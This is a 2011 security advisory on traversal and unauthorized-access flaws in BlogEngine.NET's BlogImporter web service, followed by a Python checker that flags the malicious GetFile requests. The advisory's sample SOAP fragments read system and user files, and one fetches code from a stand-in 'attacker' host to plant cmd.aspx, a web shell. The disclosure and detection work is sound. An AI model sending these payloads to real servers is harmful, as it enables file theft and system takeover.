BlogEngine.NET Unauthorized Access / Directory Traversal

🗓️ 05 Jan 2011 00:00:00 | Reported by Deniz Cevik | Type: packetstorm | 🔗 packetstormsecurity.com


Code
`Product: BlogEngine.NET  
Vendor informed: 24 Sep 2010  
Fixed Version Released: 01 Jan 2011  
Affected Versions: 1.6.x and prior versions  
Severity: Critical  
Impact: Information Disclosure and System Compromise  
  
Description:  
  
BlogEngine.NET is an open source .NET blogging project that was born  
out of desire for a better blog platform. A blog platform with less  
complexity, easy customization, and one that takes advantage of the  
latest .NET features. We discovered several security problems in  
/api/BlogImporter.asmx web service which comes with default  
BlogEngine.NET installation.  
  
1- Path Disclosure - Several functions of blogimporter.asmx, such as  
AddComment or AddPost, may reveal the local path where the application  
is stored. A remote user can use this information to determine the  
full path of the web root directory.  
  
2- Unauthorized Access - The "source" parameter of the GetFile function  
may allow access to files outside of the webroot directory. Attackers  
can use this problem to identify whether a file exists, or to find the  
locations of system/configuration files such as win.ini, web.config  
etc. If the file exists at the requested path, the application returns  
"true" in the HTTP response; if it does not exist, the application  
returns "false". A sample portion of a SOAP request that causes the  
problem is shown below.  
  
<GetFile xmlns="http://dotnetblogengine.net/">  
<source>c:\Windows\win.ini</source>  
<destination>string</destination>  
</GetFile>  
  
3- Directory Traversal and File Upload - The "destination" parameter of  
the GetFile function is prone to a directory traversal attack with the  
/../../ sequence. Using this problem it is possible to upload files  
from remote sites to locations outside of the App_Data/files directory,  
which normally cannot be accessed by web users, to open important local  
configuration files (such as web.config or App_Data/users.xml), to see  
the source code of applications, and to execute OS commands via  
uploaded applications. This problem may allow unauthorized users to  
fully compromise the target system.  
  
<GetFile xmlns="http://dotnetblogengine.net/">  
<source>c:\webroot\blog\App_Data\users.xml</source>  
<destination>../../aa.txt</destination>  
</GetFile>  
  
<GetFile xmlns="http://dotnetblogengine.net/">  
<source>http://attacker/evil.aspx</source>  
<destination>/../../cmd.aspx</destination>  
</GetFile>  
  
Solution:  
  
Upgrade to BlogEngine.Net 2.0 or remove /api/BlogImporter.asmx.  
  
Deniz CEVIK  
Best Regards  
`
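
A defender-side check for the GetFile requests shown in the advisory, as an added example that is not part of the original advisory or of BlogEngine.NET: it parses a captured SOAP body, flags a `source` that names a server-side path, and resolves `destination` with Windows path rules to see whether it leaves the upload directory. The base path `c:\webroot\blog\App_Data\files`, the function names and the SOAP envelopes wrapped around the advisory's fragments are assumptions constructed for illustration.

```python
import ntpath
import xml.etree.ElementTree as ET  # for live traffic, prefer a hardened parser such as defusedxml

NS = "{http://dotnetblogengine.net/}"      # namespace used in the advisory's samples
BASE = r"c:\webroot\blog\App_Data\files"   # assumed install path (constructed)

def escapes_base(destination, base=BASE):
    """True if destination, resolved with Windows path rules, lands outside base."""
    dest = destination.replace("/", "\\")
    # A rooted destination such as \..\..\x makes join() discard base's directories.
    full = ntpath.normcase(ntpath.normpath(ntpath.join(base, dest)))
    root = ntpath.normcase(ntpath.normpath(base))
    return not full.startswith(root + "\\")

def is_local_path(source):
    """True for drive-letter, UNC or rooted paths, i.e. files on the server itself."""
    drive, _ = ntpath.splitdrive(source)
    return bool(drive) or source.startswith(("\\", "/"))

def inspect_request(body):
    """Return (parameter, finding, value) tuples for each GetFile element in a SOAP body."""
    findings = []
    for el in ET.fromstring(body).iter(NS + "GetFile"):
        src = (el.findtext(NS + "source") or "").strip()
        dst = (el.findtext(NS + "destination") or "").strip()
        if is_local_path(src):
            findings.append(("source", "local-path", src))
        if dst and escapes_base(dst):
            findings.append(("destination", "escapes-upload-dir", dst))
    return findings

def envelope(source, destination):
    """Wrap the advisory's GetFile fragment in a SOAP 1.1 envelope (constructed)."""
    return ('<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
            '<soap:Body><GetFile xmlns="http://dotnetblogengine.net/">'
            f"<source>{source}</source><destination>{destination}</destination>"
            "</GetFile></soap:Body></soap:Envelope>")

# The three request fragments quoted in the advisory, wrapped for parsing.
SAMPLES = [
    envelope(r"c:\Windows\win.ini", "string"),
    envelope(r"c:\webroot\blog\App_Data\users.xml", "../../aa.txt"),
    envelope("http://attacker/evil.aspx", "/../../cmd.aspx"),
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(inspect_request(body))
```

The containment test compares against the base path plus a trailing separator, so a sibling directory whose name merely starts with `files` is still reported as outside.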
